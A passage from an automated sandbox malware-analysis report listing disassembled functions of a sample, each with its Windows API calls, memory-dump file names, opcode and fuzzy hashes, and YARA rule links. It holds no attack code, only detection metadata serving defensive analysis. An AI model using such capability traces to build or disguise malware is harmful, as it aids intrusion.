                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Process$CloseCreateCurrentHandleLogonOpenTokenWith
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2621361867-0
                                                                                                                                                          • Opcode ID: 0801b7fdb6247d77093f3625f6686d8d067a113c52af35e25eb9874766479a0d
                                                                                                                                                          • Instruction ID: 09630283f7795a3b9ed711460de236824f4dc58596c00056bc0dca5b047508d7
                                                                                                                                                          • Opcode Fuzzy Hash: 0801b7fdb6247d77093f3625f6686d8d067a113c52af35e25eb9874766479a0d
                                                                                                                                                          • Instruction Fuzzy Hash: 3E216D7210520DEBDF019FA8ED89BEE7BA9EF05309F044015FE11AA560C7B6CDA5DB60
                                                                                                                                                          Function 00188834 Relevance: 6.1, APIs: 4, Instructions: 69COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetWindowLongW.USER32(?,000000EC), ref: 001888A3
                                                                                                                                                          • SetWindowLongW.USER32(?,000000EC,00000000), ref: 001888BD
                                                                                                                                                          • SetWindowLongW.USER32(?,000000EC,00000000), ref: 001888CB
                                                                                                                                                          • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 001888D9
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Window$Long$AttributesLayered
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2169480361-0
                                                                                                                                                          • Opcode ID: d3790afe60df3fc56df8949f9c6888c195862f09489c7e438b6356905fe801c5
                                                                                                                                                          • Instruction ID: 2e81dff3fb8d57ae67d6d5b0ea502e994d1856c411700b0a5fa17cbb8c8edb93
                                                                                                                                                          • Opcode Fuzzy Hash: d3790afe60df3fc56df8949f9c6888c195862f09489c7e438b6356905fe801c5
                                                                                                                                                          • Instruction Fuzzy Hash: 5711B231305524BFDB14AB28EC15FBA7BAAEF9A320F544119F916C76E1CB70AD50CB90
                                                                                                                                                          Function 0017900C Relevance: 6.1, APIs: 4, Instructions: 69networkCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • select.WS2_32(00000000,00000001,00000000,00000000,?), ref: 0017906D
                                                                                                                                                          • __WSAFDIsSet.WS2_32(00000000,00000001), ref: 0017907F
                                                                                                                                                          • accept.WS2_32(00000000,00000000,00000000), ref: 0017908C
                                                                                                                                                          • WSAGetLastError.WS2_32(00000000), ref: 001790A3
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ErrorLastacceptselect
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 385091864-0
                                                                                                                                                          • Opcode ID: 47d00baa6b19b2318ad29d730b7d4995e7a25b3bd0003db94115a9f08be4485e
                                                                                                                                                          • Instruction ID: 02e9efed9e3aa535ae065519caa969307fadd91f75458c39ab013b75d082eeae
                                                                                                                                                          • Opcode Fuzzy Hash: 47d00baa6b19b2318ad29d730b7d4995e7a25b3bd0003db94115a9f08be4485e
                                                                                                                                                          • Instruction Fuzzy Hash: 6D214272A001249FC7149F69D885ADABBFCEF5A714F00816AF84AD7290DB74DA858B90
                                                                                                                                                          Function 001618E8 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 00162CAA: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,001618FD,?,?,?,001626BC,00000000,000000EF,00000119,?,?), ref: 00162CB9
                                                                                                                                                            • Part of subcall function 00162CAA: lstrcpyW.KERNEL32(00000000,?,?,001618FD,?,?,?,001626BC,00000000,000000EF,00000119,?,?,00000000), ref: 00162CDF
                                                                                                                                                            • Part of subcall function 00162CAA: lstrcmpiW.KERNEL32(00000000,?,001618FD,?,?,?,001626BC,00000000,000000EF,00000119,?,?), ref: 00162D10
                                                                                                                                                          • lstrlenW.KERNEL32(?,00000002,?,?,?,?,001626BC,00000000,000000EF,00000119,?,?,00000000), ref: 00161916
                                                                                                                                                          • lstrcpyW.KERNEL32(00000000,?,?,001626BC,00000000,000000EF,00000119,?,?,00000000), ref: 0016193C
                                                                                                                                                          • lstrcmpiW.KERNEL32(00000002,cdecl,?,001626BC,00000000,000000EF,00000119,?,?,00000000), ref: 00161970
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: lstrcmpilstrcpylstrlen
                                                                                                                                                          • String ID: cdecl
                                                                                                                                                          • API String ID: 4031866154-3896280584
                                                                                                                                                          • Opcode ID: b7bc197e4a1544821af71f367f091074d1f560caada4e44de97b4737f214e212
                                                                                                                                                          • Instruction ID: 5ab7f30dce61412542d44f054feefc14756789dceff042a122d03f1e6c022174
                                                                                                                                                          • Opcode Fuzzy Hash: b7bc197e4a1544821af71f367f091074d1f560caada4e44de97b4737f214e212
                                                                                                                                                          • Instruction Fuzzy Hash: 6711DD3A200302BFDB15AF34DC55D7A77B9FF89350B44842AF806CB2A0EB319861C7A1
                                                                                                                                                          Function 00153D46 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • _free.LIBCMT ref: 00153D65
                                                                                                                                                            • Part of subcall function 001445EC: __FF_MSGBANNER.LIBCMT ref: 00144603
                                                                                                                                                            • Part of subcall function 001445EC: __NMSG_WRITE.LIBCMT ref: 0014460A
                                                                                                                                                            • Part of subcall function 001445EC: RtlAllocateHeap.NTDLL(01710000,00000000,00000001), ref: 0014462F
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AllocateHeap_free
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 614378929-0
                                                                                                                                                          • Opcode ID: 1e375f15f4c2ea30243b7c97a78273b51d2d4a14762932d666f684f968f886b3
                                                                                                                                                          • Instruction ID: fd5e8488c4a078f35e9e65f159809bd680301dc64d233db76144a2dcf1b7bcc2
                                                                                                                                                          • Opcode Fuzzy Hash: 1e375f15f4c2ea30243b7c97a78273b51d2d4a14762932d666f684f968f886b3
                                                                                                                                                          • Instruction Fuzzy Hash: 2011C432801612DBCB253FF0A8447AE3BB8BF103A2B904425FD298F5A1DF7489C48A50
                                                                                                                                                          Function 001613D1 Relevance: 6.1, APIs: 4, Instructions: 64registryCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 001613EE
                                                                                                                                                          • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00161409
                                                                                                                                                          • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 0016141F
                                                                                                                                                          • FreeLibrary.KERNEL32(?), ref: 00161474
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Type$FileFreeLibraryLoadModuleNameRegister
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3137044355-0
                                                                                                                                                          • Opcode ID: b26e3d1c08c0d64f78db6fe9e7de590620d281ec25822e90480c20b98db59a06
                                                                                                                                                          • Instruction ID: feb14450562337b64c9c96982a5b697153612c634d731bf21035201af7fd5de4
                                                                                                                                                          • Opcode Fuzzy Hash: b26e3d1c08c0d64f78db6fe9e7de590620d281ec25822e90480c20b98db59a06
                                                                                                                                                          • Instruction Fuzzy Hash: 8221ACB1A00209FBDB209FA1DC88ADABBB8EF00700F048969A95297510DB74EA54CF90
                                                                                                                                                          Function 0015C265 Relevance: 6.1, APIs: 4, Instructions: 58windowCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • SendMessageW.USER32(?,000000B0,?,?), ref: 0015C285
                                                                                                                                                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0015C297
                                                                                                                                                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0015C2AD
                                                                                                                                                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0015C2C8
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: MessageSend
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3850602802-0
                                                                                                                                                          • Opcode ID: d3d80c7211f50018737fe9b884b86a1f2e139ea0443a495504ab563fd6c7e616
                                                                                                                                                          • Instruction ID: bb9ba1dfed7b40dff170c2f9fb4a085e047005dae612ce63398955cc05982bcc
                                                                                                                                                          • Opcode Fuzzy Hash: d3d80c7211f50018737fe9b884b86a1f2e139ea0443a495504ab563fd6c7e616
                                                                                                                                                          • Instruction Fuzzy Hash: 1211187A940218FFDB11DFD9C885E9DBBB4FB08710F204091EA15BB294D771AE11DB94
                                                                                                                                                          Function 00167C45 Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00167C6C
                                                                                                                                                          • MessageBoxW.USER32(?,?,?,?), ref: 00167C9F
                                                                                                                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00167CB5
                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00167CBC
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2880819207-0
                                                                                                                                                          • Opcode ID: 58b53cc16007f39a0478e68df6db37cdcae3cf7bccf1b346a4859dad6eb83f99
                                                                                                                                                          • Instruction ID: 9d4f76423afb30e8cc1164d13887327d261149c7a4d6f378d1fffdd948dfa4ac
                                                                                                                                                          • Opcode Fuzzy Hash: 58b53cc16007f39a0478e68df6db37cdcae3cf7bccf1b346a4859dad6eb83f99
                                                                                                                                                          • Instruction Fuzzy Hash: CA112672A04244BFC702DFACEC4CA9E7FAD9B05324F144255F825D36D0D7708D9487A0
                                                                                                                                                          Function 0013C619 Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0013C657
                                                                                                                                                          • GetStockObject.GDI32(00000011), ref: 0013C66B
                                                                                                                                                          • SendMessageW.USER32(00000000,00000030,00000000), ref: 0013C675
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CreateMessageObjectSendStockWindow
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3970641297-0
                                                                                                                                                          • Opcode ID: ee5ea8bfa2d9105be6708b6d8aa8ba63a53b5a2dcde0728c68ec231342f24646
                                                                                                                                                          • Instruction ID: e21df795e2e8ff0d2483455819ae19127e57dbb76ff3b7a604b4fc2d710f9b9e
                                                                                                                                                          • Opcode Fuzzy Hash: ee5ea8bfa2d9105be6708b6d8aa8ba63a53b5a2dcde0728c68ec231342f24646
                                                                                                                                                          • Instruction Fuzzy Hash: 04116DB2501A59BFDF164FA09C45EEABB6DEF09364F055215FA05A2220D732DCA0DBA0
                                                                                                                                                          Function 001649D1 Relevance: 6.0, APIs: 4, Instructions: 50sleepCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • QueryPerformanceCounter.KERNEL32(?), ref: 001649EE
                                                                                                                                                          • Sleep.KERNEL32(00000000), ref: 00164A13
                                                                                                                                                          • QueryPerformanceCounter.KERNEL32(?), ref: 00164A1D
                                                                                                                                                          • Sleep.KERNEL32(?), ref: 00164A50
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CounterPerformanceQuerySleep
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2875609808-0
                                                                                                                                                          • Opcode ID: 3e36b3248719019ce48bfd633a19497c9558849e6e3185c42e928d5b8be4cc3a
                                                                                                                                                          • Instruction ID: 8fbe0516de48f6a20471c9031b6a1f88411d3ccf71bf4c7f1cda4100d21615ee
                                                                                                                                                          • Opcode Fuzzy Hash: 3e36b3248719019ce48bfd633a19497c9558849e6e3185c42e928d5b8be4cc3a
                                                                                                                                                          • Instruction Fuzzy Hash: B9112A31D41518EBCF04AFE5ED49AEEBB74FF09751F014055E942B3250CB3095A0CB99
                                                                                                                                                          Function 00155BA2 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3016257755-0
                                                                                                                                                          • Opcode ID: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                                                                                                                          • Instruction ID: c39be63b86aa4a6f2daa071b8bc7c3521ff0d4a71f233572fbfd18491385114f
                                                                                                                                                          • Opcode Fuzzy Hash: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                                                                                                                          • Instruction Fuzzy Hash: E9017B3200064EFBCF125E84DC61CEE3F67BB18392B588914FE2859031C332CAB5AB81
                                                                                                                                                          Function 001480E2 Relevance: 6.0, APIs: 4, Instructions: 47COMMONLIBRARYCODE
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
